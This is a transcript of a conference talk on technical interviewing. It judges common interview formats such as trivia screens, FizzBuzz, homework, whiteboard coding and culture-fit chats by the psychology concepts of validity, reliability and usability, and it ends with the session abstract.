invented correct ways to do interviewing, there are other fields that have, specifically ones that have been around a lot longer than we have, psychology. And what I want to talk about today is industrial and organizational psychology. So this is one of the major branches of psychology. It started in the 1800s, late 1800s. It really came to prominence in the 1920s, which is during the First World War, what happened was psychologists in the Army needed to figure out where to place a million recruits, literally one million recruits. And so they needed to come up with a way to handle that process. And so they started to codify what they call selection. So I'm going to include, at the end of this, there's all the references and there's a lot that you can look up. If you do find yourself wanting to look at primary material, selection is the name of the concept that you want to Google. Cool? And so it's going to be a little bit tough for me to cover 100 plus years of psychology. Unfortunately, they have written a lot over the course of five generations, as it turns out. But so what I want to do instead is I'm going to give you a tool in three parts, a way to think about the interviews that you're doing. And then we're going to cover a couple of the common kind of tropes, the things that we tend to see in interviews, and look at them through that lens. Cool? I like you. So number one is validity. So if we have something we want to measure, if we have a construct, is what we call this in psychology, validity tells us whether our measurement measures that thing. Right? These bullets do not, they're bullets, I promise, do not very closely line to each other, but they are all centered approximately on the bull's eye. That's validity. It's okay that they're spread out. It's okay that in fact most of them are wrong because they are measuring the correct concept. And there's a couple different factors to validity, things that I want to consider while we're here. One of them, one type of validity, is the question of whether the thing, the question that you ask corresponds to the concept you want to test. And so if, let's say I wanted to test whether you know arithmetic, if I ask you to list off the digits of pi, is that a test of your arithmetic abilities? No. Right? If I ask you to do five plus five, may not be a great question, but it is in fact arithmetic. Right? And the second type of validity that I want to talk about is a sort of wider one. Given that I can test your arithmetic, does that correspond to a skill that I need you to have? I can test your arithmetic, but if the job that I'm trying to hire you for is carpenter, is that actually a valid skill for the job? So it's called external validity, is the name of that one. And you'll notice that all the concepts of validity talk about a construct that you want to test. You have to know what the bull's eye is. And so this is actually our first wrinkle when we come to hiring a developer. Because as it turns out, we probably do not agree on what makes a good developer. There's a lot of complication to our field. And so as it turns out, it's very difficult for us to say what success even is in this sense. So think about what a great developer would be in your terms. Right? Hopefully it doesn't look like this. Maybe, maybe not. But what it probably does look like is people that you know, or people on your team, who have been very successful. And you think about a bunch of characteristics of those people who you've seen who are successful, and you kind of generalize and say, okay, that's a good developer. But that is not a real concept of good developer. What that is is kind of a bag of characteristics. Some of them may actually relate really well to whether somebody's a good developer. Some of them may not at all. And so one of the things that happens is when we start to measure people based on what we've seen from success, we end up measuring all these things that we didn't intend to, and we get that. And we get more of that. And that's what our entire team becomes. Reliability is concept number two. So if validity is whether we're centered on the bullseye, reliability is how close our measurements are to each other. So in this case, we don't even care if it's centered as long as the measurement comes out the same. So just like validity, there are a couple different concepts in here. One of the big ones that's really important in technical interviewing is that if I give you an interview and if somebody else gives you that same interview, you should get the same score. If you don't get the same score, you're not measuring the candidate, you're measuring the interview. Right? That includes if I interview you and then another day I were to interview you but I'm pissed off. These things should not impact our measurements, but they do. That's called inter-rater reliability. A second one is if I take an interview once and if I take that interview a second time, I should get the same score. This is called test-retest reliability. And what that means is that if there's an element of chance, if there's an element of did I happen to follow the one path or the other path and it totally changes my score, again, I have not measured me, I've measured the instrument or I've measured the random chance that I took A instead of B and we're hiring on a dice roll. Right? And then the third type of reliability, we're not going to see a ton of this, but if I were to have multiple questions, those questions need to yield the same result. So if you go back to our arithmetic example, if I ask you what's five times five, thank you, some of you know arithmetic. What's eight times eight? Thank you. What's 265 times 12? Nobody. Clearly, you don't know arithmetic. Right? It's the same form of question, but what happens is we have these questions where there's some other confounding variable. In this case, we've all memorized a very particular set of multiplications and we're not actually doing them in our head, we're just doing them by row. This happens all the time in interviewing. We measure a construct that some people have memorized and other people have not. And all those concepts of reliability, I think there's an interesting one, point towards approximately the same thing. They point towards consistency. So we're not going to belabor this in the rest of the talk, but I want to say that if you give the same interview, if you give it the same way, if people have a scoring rubric so that it doesn't matter who's there, what matters is how you do. If that scoring feedback is objective, you will tend to be reliable. So reliability, consistency, I'll say consistency breeds reliability. So number three, usability. I held up two fingers for three. We could probably come up with a valid, reliable interview for developers and what it would look like is having you do one of everything. If I were to do this in my arithmetic, I would just ask you one of every single question. But of course this doesn't work, right? And it's tempting sometimes in our interviews to be able to just smash enough things in that we get that accurate measurement, but of course that doesn't work. It's exhausting, people don't want to go through it. And ultimately what we have is a really limited opportunity to take measurements from people. So we need to be really careful about how our usability works. And this differs between company to company. So one of the things that's really tragic about stealing the Google interview, if you take Google's interview and use it for yourself, they can abuse their candidates and people still want to go work for Google, right? It's true. It's kind of a shitty process. But it works for them because people don't drop out. That probably doesn't work for you. And this is different between candidates as well. So imagine we give homework, let's say it's a 20-hour homework, right? It's something that takes a bunch of time. Some candidates, if you don't have a job, let's say you just graduated a boot camp, let's say that you just left your job, fantastic, no problem. If you're somebody who has a real job or got help, if you're somebody who has a family, if you have other commitments, if you've ever had a medical issue, this is now what you're measuring. You didn't mean to measure that. You didn't mean to just exclude anybody who had ever had a family, but that's what's happening. So we need to keep usability in mind. And so to throw a couple other confounding factors, your target probably does not look like this. Or in reality, nobody's target looks like this. But your target looks like something else. And that is because your requirements, the things that you do, the constructs you need to measure are different for you than they are for everybody else, right? And so you cannot just take somebody else's interview. And when you're thinking about these interviews, you can't simply say, okay, we'll just maximize one dimension, right? I can tell you approximately how valid different types of interviews are. But you have to balance that against the other factors. You need to say, should I trade off validity for reliability? Because the correct answer is often yes. And then in reality, bringing back to the usability, we get this kind of thing. Three concepts, pick two-ish, probably really pick like one and a half. So there is no perfect interview. You're not going to get something that is off to the top right here. You're going to get something that's messy and dirty. And what that means is that the only way for you to tell if that interview works is to test your interview. You must test your interviews. And what that looks like, if you have an existing team, this is actually nice, you can give your interview to your existing team, assuming you like them. If you don't like them, just invert the results. But assuming you like them, you can give the interview to your own team. But that's also not good enough. And this is why it's so hard to do stuff like measurement. Because if you had, let's say that you managed to come up with a team that's all right-handed, if you used to now create an interview that happens to be very difficult to complete with your left hand, your entire team will succeed. We are accurate and valid in all those things. But again, we've managed to measure something we don't intend to. So you need to go out and you need to test your interview against people who are not part of your existing team and who are not part of the kind of experience and demographics of your existing team. Cool? All right. Let's figure out how to use these tools. I don't know if that's an ax or a hammer, but it's probably an ax. So we have the tools, we have reliability, we have validity, and we have usability. Let's talk through the interviews. So I'm going to cheat. This is not part of the interview, but it's my talk and you can't all leave fast enough. So, huh. The interview process really does start back at the job posting. This is good and this is bad. The reason I wanted to bring this in here is because if you, again, if you have, if you accidentally exclude a bunch of people, if your job posting causes nobody with, you know, left-handedness to apply, then nothing you do in the rest of the interview will ever fix that, right? They're not even in your queue. Let's talk about what you need. This is the opportunity. So we talked about constructs and we talked about how you can't just steal them from somebody else. The job posting is an opportunity to think about the things that make somebody successful for your organization. You need to think about what things you actually want to measure. And a good rule of thumb here is that if you're putting it as a real requirement, you should probably actually measure it during the interview. If you have something you're not going to bother to measure it, you probably don't need it. You need to prioritize these things because everybody is different and everybody is flawed. And so in reality, if you have, you know, a list of six things that you really need, pardon me, you probably really only need like four or five of them. And if somebody comes in, you may want to hire them anyway. And then again, going to need versus want, I want somebody who's great at testing, I want somebody who's great at refactoring, I want somebody who can scale my services and who can scale everything and scale buildings, but I don't need that. And so remember that many people have been socialized not to apply for jobs that they don't qualify for. So the more you put on the need, the more you exclude people. I happen not to agree with applying for jobs you don't qualify for, but that is the reality of what it is. What are you asking for? The actual text of your posting is really relevant. Have any of you ever declined to apply for a job or discontinued applying for a job? Because you saw a posting that wanted like some variation of the Ninja unicorn Jedi, right? Is anybody, so I have neglected to apply for places just not interested, right? Do you think that they meant to exclude me? No. I'm a ninja. Yeah. But the reality is that that happens. And so the words that you use, what you actually ask for matters. In the resources, I'm going to point to two different things, two resources that I like to use for this. One of them is called Textio. What they do is you put your posting in there and it kind of tells you these are things like these are corporatey words that people tend not to do very well, right? And that can help you. And the other one is called JobLint. And so that's one where again, if you've got these kind of ninja rock star, we're going to go crush some code, it can point out a lot of those things to you that you may not have considered in the past. So you need to be careful about what we are asking for. And then we need to think about where we are asking. If the only place that you post your job is Carnegie Mellon, where by the way you are like the 50th most interesting startup, right? Your team is going to reflect precisely one background. It's going to be CMU. That's not good. We need to have a variety of depth. The same thing goes for your network. If your network is relatively homogenous, if you all tend to come from the same place and do the same things, that is not going to create a sufficient candidate for you. You need to think about where you are posting jobs. You need to reach outside of that comfort zone to find more people. And ultimately this is a good thing for your team. It's the initial screen. We get some resumes. Let's talk about the different types of screeners that people tend to get. These are like trivia, I think would be the category you would call this. If you want a litmus test, if you can Google something in 30 seconds or it will take you like 10 seconds in IRB, it's probably a trivia question. So let's think about validity here. In theory, well, maybe not this question so much, but there are questions that are trivia that you could ask that might be valid. The problem is that there's not very much signal. Usually if I ask one thing like what's the name of this method or what's the order of arguments of this method, it's very little data. And what it ends up rewarding, what it ends up measuring instead is recency. Have you dealt with it lately? So a lot of times the way this interview works is that the director or the CTO reads something on Reddit and then they go have a phone interview and they're like, oh, hey, do you know this thing? What is the memory footprint of this string thing? Is that valid to the job? No. A minute ago you didn't know it and you were fine. So this is not real valid criteria. Could it be reliable? If you ask the same question, I think it could be reliable. Do people ask the same trivia question? No. They mostly get it from whatever they were thinking about last. So in practice, this is rarely reliable. Is it usable? Well, one trivia question is very easy. I'll say I think that you could get a more valid version of this by asking like 50 of these. I think that with enough trivia you might be able to get something that resembles a valid question, but then that's not usable. This is not a very good one. Do you know this part of? Very common font screen. This is FizzBuzz. I think FizzBuzz is interesting. So jumping it valid, is it valid? Maybe. There is an aspect to it that says can you write some amount of code? It does suffer from the problem where people tend to study for FizzBuzz. If you are a boot camper, you absolutely are learning to write FizzBuzz code. But it does track some kind of concept. Is it reliable? Yeah, it's probably reliable. I can administer it. I can think about the different types of things that people get right, get wrong, I can score it. Is it usable? Yeah, it's actually pretty usable. I think ultimately that's why people use it, is because it's very easy to administer. If we wanted to make this better, we would probably want to change it from one that's really well known. Like I said, everyone knows FizzBuzz. You're looking for a job, learn FizzBuzz code. You've now passed 30% of phone screens. Good work. But I think if we change that, we would have something that's a little more valid. Homework. Who issues homework as part of their hiring process? By which I mean go write some code on your own time and submit it. Fair number of people. I think, again, homework is an interesting one. Homework is super valid. Homework is a work sample test. So in the terminology of IoPsych, probably the most predictive way to look at somebody's work is to have them do the work. As a work sample test. Homework works for this. But it has significant problems. The reliability is an issue here, because what you have is candidates, some of whom can spend 20 hours and some of whom can spend five hours. And if you're grading criteria, don't take this into account. You end up with a really, really different set of scores for people. And you did not intend to measure, again, whether I have commitments at night, but you did. And so the way we can fix that is maybe to put some parameters around it. Hopefully you give them an assignment that's related to your work. It goes to validity. Hopefully you give them an assignment and you say, spend about five hours. Could somebody cheat? They could. But it gets you closer to having an accurate baseline comparison. And hopefully you don't give any homework that is like, please re-implement our whole app or please work on this NP complete problem or this thing that our software architects can't even solve. But show us a working demo. Sometimes we have this tendency to just like, that's a thing I was thinking about. It doesn't work. And then I'm not going to spend a lot of time on this one, but something I've seen a lot of recently is these sort of sites where they promise to give you a score. And so you go there. And I think it's super, super usable because it doesn't take any engineer time. And it may even be reliable because you tend to ask like the one question, right? Or a handful of questions are the same question. But the question of validity comes up here. And I think that this is ultimately where these become problematic is that the questions in their question bank, because they need to be auto gradable and because they need to generate this big volume of them tend to have very little to do with the actual business of building software. Is that fixable? Probably. Have I seen it yet? No. So interview day. A year ago, Carrie Miller gave a talk at RailsConf about hiring. Problem solved. It's actually a really good talk. You should go watch it. And there are a lot of things about the interview day that she covers. The big ones I want to cover right now is really minimizing variance. So anything that differs between candidates ultimately is going to give you extra noise that you're not measuring. What that means is that you should have a schedule and it should be a consistent schedule. You should know who your interviewers are and your candidate should know that as well. Your interviewers need to be trained. They need to understand what it is that they're doing. They need to have a scoring rubric. And I'm going to contend here that your candidate should probably know what you're measuring. Because if you're being sneaky about it, it's probably a stupid question. Right? So if you can do those things, tell them what to expect. You're going to put them more at ease. You're going to get more signal. First thing they go into, code writing, has anyone implemented a, we'll say a red black tree at work in the last year? No? No hands? Okay. Good. Don't do algorithms. They look like code. They look like code we use but in reality that's not how we build software. Nobody ever implements red black trees from memory at work. Right? So there's a problem. They feel valid but they're really not because the correspondence is very low. Are they reliable? No, not really. They have some of the same recency bias. Somebody who studies, somebody who just graduated CS is probably going to remember this better than somebody who's got a bunch of years of experience. And so great. Now you have an inverse selection. You select for inexperience because those people remember algorithms. Good work. Usability? Yeah, it's probably pretty usable. Right? I think a better version of this would be if you were to take an algorithm, like don't pick something with somebody famous's name, Dijkstra's anything or, you know, any of that. Pick an algorithm that you don't really, that you make up and have them implement that from a sheet of paper. Say here's the algorithm, here's your laptop, do that. This defeats the recency bias. This is an actual test of what we do for software, just translating requirements into working code. Don't give algorithms. The even worse version, whiteboard coding. And everyone's expecting me to hit on whiteboard coding and I will because it's dumb. If at your job you're required to whiteboard code. Not if you have the option, not if people tend to, but if you're required to whiteboard code, please by all means go ahead. If not, what you are measuring is a skill that people don't use unless they are practicing interviews. In that case, just give them a fucking laptop. It's really not that hard. And then the live bug code. Does anyone do this? Wait, don't raise your hands. It's technically illegal. If you're not paying your candidates, you can't have them work on production code in most states. Check your local list. But so the cool thing about this, validity-wise, this is 100% valid, right? Because this is the work. You could not get more valid than this. That's cool. The problem becomes the reliability. If you're working on real code, you generally can't repeat the same problem. Or if you do, you have serious problems and shouldn't be hiring. So usually what that means is we have this trade-off. Either I spend a ton of time in my backlog finding things that are similar-ish, in which case it's not usable. Or I just kind of pluck something out, in which case it's not reliable. Remember that parallel form is reliability. But also it's illegal, so probably you shouldn't do it. So now that they're exhausted, they've written some code, let's do some problem-solving. Does anyone know what interview question this is? I actually got hired on this once. It's dudes, they're buried up to their necks, and they've got hats on, and like, you have to tell who's wearing what color hat, and if they do that, then like, they don't get killed or something. This is just dumb. Sorry about validity. No. Sorry about reliability. No. Sorry about usability. Yeah, great usability. Awesome. But you've measured nothing. Not only that, but your candidates are probably looking this up. Again, if you're a boot camper, if you're looking for a job, just go look up like the six or seven of these that everybody uses. Learn called, you find, pretend that you're having a hard time with it, and then come up with a trick. Ta-da. A little bit better, case studies. Given a hypothetical, how would you deal with it? This can be valid. You can use your existing work. This can be reliable. You can give the same case study based on historical precedent. You need to modulate a little bit. If you have a senior developer and you are giving them, say, some architectural problem that you can't solve, it's an issue. If you have a junior developer and you're giving them effectively any architectural problem, that's not something that's in their skill set. It's probably not what you mean to measure. But even better, this is my favorite kind of interviewing. Behavioral interviewing? Has anyone ever seen this? So this, it takes the same form every single time. It's tell me about a time when X. And the reason this works is that despite what they have to say in the financial sector, past performance absolutely predicts future performance. Absolutely does. And so this is a great interview in so far as you can test somebody's real experience. It's valid. Yeah, I know. Great work. It's reliable. You can test the same thing over and over again. And then usability. There's a little bit of a challenge. It turns out that to get good answers out of people, you have to train them on this kind of interviewing. But that's okay. You can overcome this. And then culture fit. If your culture fit looks like everyone I've seen before, it's your CTO or your director going in, shooting the shit for about 40 minutes and then deciding yes or no, right? So you've had this before. You're measuring for people like me. There's no criteria. There's nothing. There's a gut feel. And the way the gut feel works is that it takes into account every one of our preconceived notions. So it is again, almost zero validity. My answer to you should be just don't do these, but you're going to do them anyway. So if you're not going to listen to me, at least think about the things in your culture that do cause people to be successful. We ship first all the time. We ship the highest quality all the time. Right? We teach everybody or we're independently capable. These kind of things that actually could measure success and at least measure those. But better off just don't use them. So you set the person home. Now that they're gone, no more problems, right? Yeah. So the way the debrief ends up working all the time is of course we get into a circle and then everybody does. It's kind of like when you do rock, paper, scissors as a kid. You're like rock, paper, scissors. People read each other, right? They read each other socially. This is what happens. Or you end up talking to the person on my left. I think this person's like an eight out of 10. They're like, yeah, no, that was the worst. You go, yeah, it's six. Because I'm like, well, I don't want to be an idiot. So the way that we fix this, we write it down first of all. Have your interviewers write down specific objective feedback. Not she was cool, but she missed the test coverage issue in this question. She solved the problem with 10 minutes to spare. And then share all that feedback at once that nobody can cheat. Make sense? Cool. So recap. If you want to hire well, welcome. Time for recap. If you want to hire well, you need to pick a set of constructs and you need to design and test interviews that are valid, reliable, and usable. Cool? There's one more thing I want to talk about before we actually go. The reason is the point at which I submitted this talk. I was having an issue with a couple clients where they had teams that we'll say were more than a little bit homogenous. And so I talked to them about their interview process. And what they always said is a feedback I get all the time is we only want to hire people. We only hire the best. We don't want to lower the bar. And I hate this, right? But I couldn't tell you precisely why. Like I couldn't give you the reasoning. I know it's wrong, but I couldn't give you the reasoning. And I understand the reasoning now as part of this talk. And the reality is that for a lot of us, what they believe, they're not bad people, but they believe they have this bar and you're over it or you're under it. And in that sense, of course, you don't want to lower it. But the reality is the bar doesn't look like this. The bar is like weird and tilted and fucked up because of all these extra things that you're measuring that have nothing to do with job success. And so I'm going to say we should probably actually raise the bar. Most people who have interviews are not nearly as tough as they think they are. But to do that, first we need to make sure that the bar is straight. Cool? Thank you. Applause.
|
Nothing makes or breaks our teams like the members they hire. And so we rate and quiz, assign homework and whiteboard algorithms until candidates are blue in the face. But does it work? In this session, we’ll unpack common interviews and how they stack up with research into predicting performance. We’ll learn to design interviews that work, what kinds don’t work at all, and how to tell the difference, with science!
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.